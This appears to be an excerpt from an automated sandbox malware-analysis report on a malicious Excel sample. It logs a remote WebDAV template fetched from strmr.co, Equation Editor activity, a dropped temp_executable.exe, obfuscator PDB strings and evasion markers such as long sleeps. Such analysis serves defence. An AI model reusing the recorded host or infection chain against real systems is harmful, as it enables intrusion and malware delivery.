          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: temp_executable.exe, 0000000C.00000002.536992954.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536837013.0000000000500000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdbBSJB source: wscript.exe, 0000000B.00000003.516567404.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537512012.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537256594.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.516558869.0000000002C41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537571049.0000000000450000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000000.518080598.0000000000BE2000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.11.dr
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: temp_executable.exe, 0000000C.00000002.536992954.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536837013.0000000000500000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdb source: wscript.exe, 0000000B.00000003.516567404.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537512012.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537256594.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.516558869.0000000002C41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537571049.0000000000450000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000000.518080598.0000000000BE2000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.11.dr
          Source: ~DF7D9593F7751AD48D.TMP.0.drInitial sample: OLE indicators vbamacros = False
          Source: QT2Q1292.xla.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 10_2_002ED9C1 pushfd ; retf 10_2_002ED9C2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00407041 push cs; iretd 13_2_00407042
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041705E push edi; iretd 13_2_00417060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004030F0 push eax; ret 13_2_004030F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041C8FC push cs; iretd 13_2_0041C8C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401949 push 63DCA26Ah; ret 13_2_0040194E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040214B push edx; retf 13_2_0040214E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402101 push ebp; iretd 13_2_0040210D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040210E push eax; retf 13_2_0040214A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004021A4 push eax; retf 13_2_0040214A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041125B pushfd ; ret 13_2_0041125E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004242D9 push esp; ret 13_2_00424330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004242E3 push esp; ret 13_2_00424330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401AB8 push edx; retf 13_2_00401AE3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00413416 push ecx; iretd 13_2_00413417
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041ECDC push ds; iretd 13_2_0041ECDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401DF5 push ebp; iretd 13_2_00401DB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401DA6 push ebp; iretd 13_2_00401DB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00416EAA push esp; retf 13_2_00416EAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401F0D push eax; retf 13_2_00401F19
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401FEB push edx; retf 13_2_00401FEC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00410FEE push ebp; iretd 13_2_00411000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00410FF3 push ebp; iretd 13_2_00411000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401FA4 push edx; ret 13_2_00401FAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401FBA push 0000006Ah; iretd 13_2_00401FC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007CDFA1 push ecx; ret 13_2_007CDFB4

          Persistence and Installation Behavior

          barindex
          Microsoft Office launches external ms-search protocol handler (WebDAV)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\strmr.co@SSL\DavWWWRootJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\strmr.co@SSL\DavWWWRootJump to behavior
          Office drops RTF file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof[1].doc.0.drJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 4B830AA2.doc.4.drJump to dropped file
          Office viewer loads remote template
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_executable.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: QT2Q1292.xla.xlsxStream path 'MBD00065630/Package' entropy: 7.98520115416 (max. 8.0)
          Source: QT2Q1292.xla.xlsxStream path 'Workbook' entropy: 7.99897282082 (max. 8.0)
          Source: ~DF7D9593F7751AD48D.TMP.0.drStream path 'Package' entropy: 7.97426321432 (max. 8.0)
          Source: 0DE30000.0.drStream path 'MBD00065630/Package' entropy: 7.97426321432 (max. 8.0)
          Source: 0DE30000.0.drStream path 'Workbook' entropy: 7.99896152479 (max. 8.0)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 1D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 310000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00810101 rdtsc 13_2_00810101
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeWindow / User API: threadDelayed 6658Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeWindow / User API: threadDelayed 418Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3880Thread sleep time: -360000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 4000Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 4076Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 4076Thread sleep time: -2400000s >= -30000sJump to behavior
